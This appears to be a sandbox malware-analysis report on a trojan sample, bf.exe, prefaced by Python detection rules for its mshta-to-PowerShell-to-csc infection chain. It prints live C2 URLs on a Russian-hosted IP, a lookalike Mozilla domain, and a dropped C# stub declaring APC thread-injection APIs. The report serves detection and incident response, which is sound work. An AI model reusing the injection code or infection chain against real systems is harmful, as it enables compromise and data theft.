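def classify(event: Dict[str, str]) -> List[str]:
    """Apply the rules to one record and return the names of the rules that hit."""
    image, parent = event["image"].lower(), event["parent"].lower()
    cmd = event["cmdline"].lower()
    hits: List[str] = []
    if image.endswith("\\mshta.exe") and "about:<hta:application>" in cmd and "regread" in cmd:
        hits.append("mshta_inline_hta_reads_registry")
    if image.endswith("\\powershell.exe"):
        resolved = resolve_aliases(event["cmdline"])[1].lower()
        if re.search(r"\b(iex|invoke-expression)\b", resolved) and re.search(r"\bhk(cu|lm):", resolved):
            hits.append("powershell_iex_from_registry")
        if ALIAS_RE.search(cmd):
            hits.append("powershell_alias_obfuscation")
    if (image.endswith("\\csc.exe") and parent.endswith("\\powershell.exe")
            and "/noconfig" in cmd and "\\appdata\\local\\temp\\" in cmd):
        hits.append("csc_compile_from_temp_via_powershell")
    return hits


def triage(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run classify() over all records, attaching the registry source when found."""
    return [{"image": ev["image"], "hits": classify(ev), "registry_source": registry_source(ev["cmdline"])}
            for ev in events if classify(ev)]


if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))
```

The alias resolution is the part worth keeping: the random names differ per infection, while the shape (Get-ItemProperty on an HKCU key, ASCII decode, Invoke-Expression) does not, so the rule matches on the resolved command line rather than on literal strings. The registry extractor hands a responder the exact key to dump and clear; for this sample both the HTA and the PowerShell stage point at the same GUID-named key, with testlocal and UrlsReturn as the two values read.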
Source: explorer.exe, 0000000B.00000000.667381073.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.711857959.00000000086BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.676177436.0000000005910000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000B.00000000.667381073.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.699898010.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.723876903.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: uProgram Manager*r
Source: explorer.exe, 0000000B.00000000.667381073.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.699898010.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.723876903.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: explorer.exe, 0000000B.00000000.667381073.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.699898010.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.723876903.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: explorer.exe, 0000000B.00000000.666643189.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.723069999.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.696674053.0000000000878000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ProgmanLoc*U
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (6 entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\bf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\control.exe | Code function: 12_2_004963E0 CreateMutexExA,GetUserNameA
Note: the Shell_TrayWnd / Progman strings are window-class names of the explorer.exe desktop and taskbar, found in explorer.exe's own memory; they are the basis for the window-discovery count in the ATT&CK matrix below, not evidence by themselves. The volume-information queries from powershell.exe against GAC assemblies and a catalog file are ordinary .NET assembly loading behaviour. The MachineGuid read by bf.exe is the one item here that a practitioner should note: it is a stable per-installation value and the usual input for a malware-side machine identifier, and the mutex created by the code in control.exe (CreateMutexExA next to GetUserNameA) is where a per-host name would be used.

Stealing of Sensitive Information

Source: Yara match | type MEMORY, memory dumps of bf.exe (process 00000000):
  00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmp
  00000000.00000003.567067174.00000000013A8000.00000004.00000020.00020000.00000000.sdmp
  00000000.00000003.567273326.00000000013A8000.00000004.00000020.00020000.00000000.sdmp
  00000000.00000003.567261727.00000000013A8000.00000004.00000020.00020000.00000000.sdmp
  00000000.00000003.567123071.00000000013A8000.00000004.00000020.00020000.00000000.sdmp
  00000000.00000003.615812905.00000000011AC000.00000004.00000020.00020000.00000000.sdmp
  00000000.00000003.614908224.00000000013A8000.00000004.00000020.00020000.00000000.sdmp
  00000000.00000003.567222358.00000000013A8000.00000004.00000020.00020000.00000000.sdmp
  00000000.00000003.567018917.00000000013A8000.00000004.00000020.00020000.00000000.sdmp
  00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp
  00000000.00000003.567191863.00000000013A8000.00000004.00000020.00020000.00000000.sdmp
  00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp
  00000000.00000003.612073912.00000000013A8000.00000004.00000020.00020000.00000000.sdmp
  00000000.00000003.613944350.00000000012AA000.00000004.00000020.00020000.00000000.sdmp
  00000000.00000003.614315107.0000000001329000.00000004.00000020.00020000.00000000.sdmp
Source: Yara match | type MEMORY, memory dump of powershell.exe (process 00000005):
  00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp
Source: Yara match | type MEMORY, memory dumps of explorer.exe (process 0000000B):
  0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp
  0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp
  0000000B.00000000.714710213.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp
Source: Yara match | type MEMORY, memory dumps of control.exe (process 0000000C):
  0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp
  0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp
  0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp
  0000000C.00000000.681883913.0000000000480000.00000040.80000000.00040000.00000000.sdmp
  0000000C.00000000.680871269.0000000000480000.00000040.80000000.00040000.00000000.sdmp
  0000000C.00000000.684080193.0000000000480000.00000040.80000000.00040000.00000000.sdmp
Source: Yara match | type MEMORYSTR, process memory spaces: bf.exe PID 1364; powershell.exe PID 4604; explorer.exe PID 3324; control.exe PID 4784
Source: Yara match | type UNPACKEDPE: 0.3.bf.exe.13294a0.1.raw.unpack, 0.3.bf.exe.13294a0.1.unpack, 0.3.bf.exe.12aa4a0.0.raw.unpack, 0.3.bf.exe.12aa4a0.0.unpack, 0.3.bf.exe.1355940.2.raw.unpack, 0.3.bf.exe.1355940.2.unpack

Remote Access Functionality

Source: Yara match | identical to the list under Stealing of Sensitive Information above: the same 25 memory dumps of bf.exe, powershell.exe, explorer.exe and control.exe, the process memory spaces of bf.exe (PID 1364), powershell.exe (PID 4604), explorer.exe (PID 3324) and control.exe (PID 4784), and the six unpacked PE files 0.3.bf.exe.12aa4a0.0, 0.3.bf.exe.13294a0.1 and 0.3.bf.exe.1355940.2 (.unpack and .raw.unpack each)
MITRE ATT&CK Matrix, techniques flagged for this sample (the number in parentheses is the badge shown beside the technique in the report's matrix):

Execution: Windows Management Instrumentation (2); Command and Scripting Interpreter (1)
Privilege Escalation: Process Injection (412)
Defense Evasion: Process Injection (412); Rootkit (4); Masquerading (1); Virtualization/Sandbox Evasion (21); Software Packing (2)
Credential Access: Credential API Hooking (3)
Discovery: Security Software Discovery (1); Process Discovery (2); Virtualization/Sandbox Evasion (21); Application Window Discovery (1); Account Discovery (1); System Owner/User Discovery (1); Remote System Discovery (1); File and Directory Discovery (1); System Information Discovery (13)
Collection: Email Collection (1); Credential API Hooking (3); Archive Collected Data (1)
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (12)
Initial Access, Persistence, Lateral Movement, Exfiltration, Network Effects, Remote Service Effects, Impact: no technique flagged
Legend:

• Process
• Signature
• Created File
• DNS/IP Info
• Is Dropped
• Is Windows Process
• Number of created Registry Values
• Number of created Files
• Visual Basic
• Delphi
• Java
• .Net C# or VB.NET
• C, C++ or other language
• Is malicious
• Internet

Behavior Graph ID: 722154, Sample: bf.exe, Startdate: 13/10/2022, Architecture: WINDOWS, Score: 100

Top-level signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 8 other signatures
DNS at start: trackingg-protectioon.cdn1.mozilla.net

Process tree as drawn in the graph (numbers in parentheses after a process are the per-process counters from the legend, created registry values / created files):

bf.exe (6), started
    network: 45.8.158.104, local port 49696, remote port 80, ASBAXETNRU, Russian Federation; DNS trackingg-protectioon.cdn1.mozilla.net
    signatures: Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; 2 other signatures
    +-- control.exe, started
mshta.exe (19), started
    +-- powershell.exe (1, 26), started
            dropped: C:\Users\user\AppData\...\4rgoqrxw.cmdline (Unicode)
            signatures: Creates a thread in another existing process (thread injection)
            +-- csc.exe (3), started
            |       dropped: C:\Users\user\AppData\Local\...\4rgoqrxw.dll (PE32)
            |       +-- cvtres.exe (1), started
            +-- csc.exe (3), started
            |       dropped: C:\Users\user\AppData\Local\...\n2sgiaoa.dll (PE32)
            |       +-- cvtres.exe (1), started
            +-- conhost.exe, started
            +-- explorer.exe, injected

Screenshots (all thumbnails, including those not shown in the slideshow): windows-stand
Antivirus detection, submitted file (Source | Detection | Scanner | Label):
bf.exe | 76% | Virustotal |
bf.exe | 30% | Metadefender |
bf.exe | 100% | Avira | TR/Crypt.XPACK.Gen7
bf.exe | 100% | Joe Sandbox ML |

Dropped files: No Antivirus matches

Unpacked PE files (Source | Detection | Scanner | Label):
0.0.bf.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen7

Domains: No Antivirus matches

URLs (Source | Detection | Scanner | Label):
http://constitution.org/usdeclar.txt | 0% | URL Reputation | safe
http://constitution.org/usdeclar.txtC: | 0% | URL Reputation | safe
http://https://file://USER.ID%lu.exe/upd | 0% | Avira URL Cloud | safe
http://crl.microsofU | 0% | Avira URL Cloud | safe
http://45.8.158.104/uploaded/MpZpEfGoUvu/8hUMFuBMM1NnXA/6MZyif_2BG2HgaMoqVeei/YUDzzwQcxrHdHNoS/EXZmG | 0% | Avira URL Cloud | safe
http://45.8.158.104/uploaded/yF6a_2FDQsakg/vhzDEpLd/QLXYBzG7kj94jslDUwFt6Q7/guaMASEjD_/2Fwjtn_2FbMKN4_2B/neZHbyl_2FTz/WRcCnPf48th/_2BnEyE4hHu4xb/OQTgNzDOBvYXhZuNKPCjo/Se4kG5Jd15I6_2BO/PIOOLab_2FaIRS_/2BJxZMNIg5OcVaNI8G/mQ26WRsBL/qXoJnMt5W6zv90WyMR1b/Ptzm2woaF0N0gfu_2Fw/LXYoIalnFw_2BDv_2BDw6X/sbGwXMB_2Fbi6/_2BA0mWm/E7uvZfJQauIX0oefIQsSQRv/Edcduhqp0k/CVtU.pct | 0% | Avira URL Cloud | safe
http://45.8.158.104/uploaded/MpZpEfGoUvu/8hUMFuBMM1NnXA/6MZyif_2BG2HgaMoqVeei/YUDzzwQcxrHdHNoS/EXZmGyBGvTrov_2/Bh6hEUV9tS11RoXAor/dNd5MwAK3/XCS5R5_2BKzlachPA71X/MbdidhiKMdjJAptDG_2/BNaZm8dRfEW1zyXDW0PSBM/dBySGVlelOOwd/9hE4I1n7/jHYTRUOb30YRjhbqgoqT1Sz/1siPfJ_2Bk/jbwyxHgiR7TKhcYfm/asMZ6QS0oVF6/3ktdFVcNy5v/GtXFAG10Xu11CO/A_2BTM8kgrY0K/a9Ia.pct | 0% | Avira URL Cloud | safe

Note on the URL verdicts: a 0% / "safe" URL reputation means no scanner holds a record of that exact path, not that the path is benign. The three 45.8.158.104 paths are requests to the host the sample itself connects to (see the behavior graph, where the traffic raised a Snort alert), so they stay indicators regardless of the score. The constitution.org, crl.microsofU and http://https://file://USER.ID%lu.exe/upd entries are strings found in process memory (the last one is a printf-style template, with %lu still in it), not destinations the sample contacted.
              NameIPActiveMaliciousAntivirus DetectionReputation
              trackingg-protectioon.cdn1.mozilla.net
              unknown
              unknownfalse
                high
                NameMaliciousAntivirus DetectionReputation
                http://45.8.158.104/uploaded/yF6a_2FDQsakg/vhzDEpLd/QLXYBzG7kj94jslDUwFt6Q7/guaMASEjD_/2Fwjtn_2FbMKN4_2B/neZHbyl_2FTz/WRcCnPf48th/_2BnEyE4hHu4xb/OQTgNzDOBvYXhZuNKPCjo/Se4kG5Jd15I6_2BO/PIOOLab_2FaIRS_/2BJxZMNIg5OcVaNI8G/mQ26WRsBL/qXoJnMt5W6zv90WyMR1b/Ptzm2woaF0N0gfu_2Fw/LXYoIalnFw_2BDv_2BDw6X/sbGwXMB_2Fbi6/_2BA0mWm/E7uvZfJQauIX0oefIQsSQRv/Edcduhqp0k/CVtU.pcttrue
                • Avira URL Cloud: safe
                unknown
                http://45.8.158.104/uploaded/MpZpEfGoUvu/8hUMFuBMM1NnXA/6MZyif_2BG2HgaMoqVeei/YUDzzwQcxrHdHNoS/EXZmGyBGvTrov_2/Bh6hEUV9tS11RoXAor/dNd5MwAK3/XCS5R5_2BKzlachPA71X/MbdidhiKMdjJAptDG_2/BNaZm8dRfEW1zyXDW0PSBM/dBySGVlelOOwd/9hE4I1n7/jHYTRUOb30YRjhbqgoqT1Sz/1siPfJ_2Bk/jbwyxHgiR7TKhcYfm/asMZ6QS0oVF6/3ktdFVcNy5v/GtXFAG10Xu11CO/A_2BTM8kgrY0K/a9Ia.pcttrue
                • Avira URL Cloud: safe
                unknown
Name | Source | Malicious | Antivirus Detection | Reputation

Name: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 0000000B.00000000.699574757.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.723471805.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.667027858.000000000091F000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: http://https://file://USER.ID%lu.exe/upd
Source: bf.exe, 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, bf.exe, 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, control.exe, 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: • Avira URL Cloud: safe
Reputation: low

Name: http://constitution.org/usdeclar.txt
Source: bf.exe, 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, bf.exe, 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, control.exe, 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: • URL Reputation: safe
Reputation: unknown

Name: http://trackingg-protectioon.cdn1.mozilla.net/uploaded/OpQxWz98QKMWv_2/FDwCe9CiLqhz94zXhO/jzUmpRbDp/
Source: explorer.exe, 0000000B.00000000.717723054.000000000F014000.00000004.00000001.00020000.00000000.sdmp
Malicious: false
Reputation: high

Name: http://45.8.158.104/uploaded/MpZpEfGoUvu/8hUMFuBMM1NnXA/6MZyif_2BG2HgaMoqVeei/YUDzzwQcxrHdHNoS/EXZmG
Source: bf.exe, 00000000.00000003.612015496.00000000006D2000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: • Avira URL Cloud: safe
Reputation: unknown

Name: http://constitution.org/usdeclar.txtC:
Source: bf.exe, 00000000.00000003.668851717.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, bf.exe, 00000000.00000003.686932943.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000003.665421509.000001C32A8EC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.740959208.00000000125FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.738730438.000000000DCBC000.00000004.00000001.00020000.00000000.sdmp, control.exe, 0000000C.00000003.684854059.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000C.00000003.684949617.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000C.00000002.724699237.00000262EE44C000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: • URL Reputation: safe
Reputation: unknown

Name: http://crl.microsofU
Source: powershell.exe, 00000005.00000003.638688227.000001C32A171000.00000004.00000020.00020000.00000000.sdmp
Malicious: false
Antivirus Detection: • Avira URL Cloud: safe
Reputation: unknown
IP: 45.8.158.104
Domain: unknown
Country: Russian Federation
ASN: 49392
ASN Name: ASBAXETNRU
Malicious: true
                    Joe Sandbox Version:36.0.0 Rainbow Opal
                    Analysis ID:722154
                    Start date and time:2022-10-13 09:27:32 +02:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 8m 15s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:bf.exe
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:12
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:1
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.expl.evad.winEXE@15/16@2/1
                    EGA Information:
                    • Successful, ratio: 50%
                    HDC Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 24
                    • Number of non-executed functions: 41
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): WMIADAP.exe, WmiPrvSE.exe
• Execution Graph export aborted for target mshta.exe, PID 5064 because there are no executed functions
• Not all processes were analyzed; report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
Time: 09:31:04
Type: API Interceptor
Description: 39x Sleep call for process: powershell.exe modified
Match: 45.8.158.104
Associated Sample Name / URL | Detection
EJ6FBXJ9Dg.exe | malicious
sadf.exe | malicious
72.exe | malicious
c0.exe | malicious
64.exe | malicious
gozi.exe | malicious
b6.exe | malicious
9a.exe | malicious
336.exe | malicious
                                      No context
Match: ASBAXETNRU
Associated Sample Name / URL | Detection | Context (contacted IP)
EJ6FBXJ9Dg.exe | malicious | 45.8.158.104
i#U00f3n.vbs | malicious | 91.213.50.74
file.exe | malicious | 194.5.78.209
file.exe | malicious | 194.5.78.209
ARMt22jv2D.exe | malicious | 194.5.78.209
file.exe | malicious | 194.5.78.209
dz0wzKoLP4.exe | malicious | 91.213.50.71
file.exe | malicious | 194.5.78.209
file.exe | malicious | 194.5.78.209
file.exe | malicious | 194.5.78.209
i#U00f3n.vbs | malicious | 91.213.50.74
1TotalNewInvoices_Th.xls | malicious | 91.213.50.43
SecuriteInfo.com.Win64.CrypterX-gen.21705.5431.exe | malicious | 194.50.171.236
8_202210279797906347.xls | malicious | 91.213.50.43
xgOjvJD3Oo.xls | malicious | 91.213.50.43
xgOjvJD3Oo.xls | malicious | 91.213.50.43
sadf.exe | malicious | 45.8.158.104
4_202210250456866742.xls | malicious | 91.213.50.43
4_202210250456866742.xls | malicious | 91.213.50.43
DB348DC69788F96C6CCDAEDB34B150FA21AC9D275A523.exe | malicious | 91.229.90.152
                                      No context
                                      No context
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:modified
                                      Size (bytes):11606
                                      Entropy (8bit):4.883977562702998
                                      Encrypted:false
                                      SSDEEP:192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
                                      MD5:1F1446CE05A385817C3EF20CBD8B6E6A
                                      SHA1:1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
                                      SHA-256:2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
                                      SHA-512:252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
                                      Malicious:false
                                      Preview:PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):1196
                                      Entropy (8bit):5.333915035046385
                                      Encrypted:false
                                      SSDEEP:24:3aZPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJF9G:qZPerB4nqRL/HvFe9t4Cv94anG
                                      MD5:B15D7C50C640BEF4A1E823CE568A5E5E
                                      SHA1:E456E2EE754F8FBA38F8F75858491258896C9E41
                                      SHA-256:A95974F134C10C31BF7B1243C3E5F3987F1CC878565E28182DEC577D552450C0
                                      SHA-512:B7E7D0303E3DCF81217B7AC871AF1C4871D8BA19CC595DB35A6640108411126666D244D8CF91D766E129E7306FBCBA9622746DF74EC030E180CFDEDB78239107
                                      Malicious:false
                                      Preview:@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                      Category:dropped
                                      Size (bytes):418
                                      Entropy (8bit):5.060887643546001
                                      Encrypted:false
                                      SSDEEP:6:V/DsYLDS81zuYl85FNVMRSR7a1X+o6RwuSRa+rVSSRnA/fMMLjUgL/Qy:V/DTLDfufVM62l9rV5nA/kePIy
                                      MD5:19FD6F555AD7C58D574C00F46F087B02
                                      SHA1:025EC4778721F20FDBFF775EDD2351BAEA93846C
                                      SHA-256:9D08DF39AD05BD4A53F416AB8EF6A2FCA313EB9A1498E451284B445BB1830DAC
                                      SHA-512:188488549588E593523DDAB3A8372D47E016841C3CE1594A456C0AC7C73763A3AE1E8A5FFFDC7B6455BD869D0F6BDEBD6B6BCB2AA6A6B4CF658231CE72DC40B9
                                      Malicious:false
                                      Preview:.using System;.using System.Runtime.InteropServices;..namespace gwrevlnvsd.{. public class pbhvkocniqy. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr fyocqdmmlp,IntPtr sqi,IntPtr fbhcpwxb);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint imqvfxfe,uint jdfds,IntPtr ptybrwff);.. }..}.
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (350), with no line terminators
                                      Category:dropped
                                      Size (bytes):353
                                      Entropy (8bit):5.245731191650942
                                      Encrypted:false
                                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fFJ0zxs7+AEszI923fHyWHn:p37Lvkmb6KztJ0WZE2qAn
                                      MD5:4B8045D39F538756B8B62138A26F11E9
                                      SHA1:95874A0DCB5655188CFD8602A1A4DCD01B521B96
                                      SHA-256:B3C78ADC05D493C0E52386D05C77480C94B732423C3B7349DF6DA13F9C5E2F41
                                      SHA-512:8C66F125151F75F4DDC2FB9062D001DCC25942DE34AB42C389D0D17E36AE2C3AABB6C5FDA9157D9BC966691A5A868B9387FA2F998EA301303B87C55EDF1B7C32
                                      Malicious:true
                                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\4rgoqrxw.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\4rgoqrxw.0.cs"
                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):3584
                                      Entropy (8bit):2.6453992775319892
                                      Encrypted:false
                                      SSDEEP:24:etGSG8mmUgtJ85HIf/EEOnV4qmShytkZf4FexdVWpEWI+ycuZhN0xmGakSfxmXPE:6wXgt65oinB1J4FcdVyn1ulWa3iq
                                      MD5:5C4B891208032DBA1A02263355E4E9DE
                                      SHA1:1BD3E625D095A101173CAF1D794FE92AD02D0C4E
                                      SHA-256:004F167A5796CA987BCC5D4FAC040D72A10D39450F74A13147E72C0DCEC80AA4
                                      SHA-512:224AEE577A4B6F6F804C82B26512FC201C78D213EAB1F983306F12AD456B57C77849E5D91DC22B54820B080220EA2A64753896960B98C349DBBA59AF6942E940
                                      Malicious:false
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...N=Hc...........!.................$... ...@....... ....................................@..................................#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..h.............................................................(....*BSJB............v4.0.30319......l...H...#~......H...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................>.7...............,.......................#.............. E............ R............ e.....P ......p.........v.................................p. ...p...!.p.%...p.......*.....3.?.....E.......R.......e...........
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (429), with CRLF, CR line terminators
                                      Category:modified
                                      Size (bytes):850
                                      Entropy (8bit):5.317499521256793
                                      Encrypted:false
                                      SSDEEP:24:AId3ka6KztJVE21uKaM5DqBVKVrdFAMBJTH:Akka6aDVE2QKxDcVKdBJj
                                      MD5:967799D658DF042EC73377D634879017
                                      SHA1:65B430F7577DF05F38080FFC1165C97BD6EDC1F2
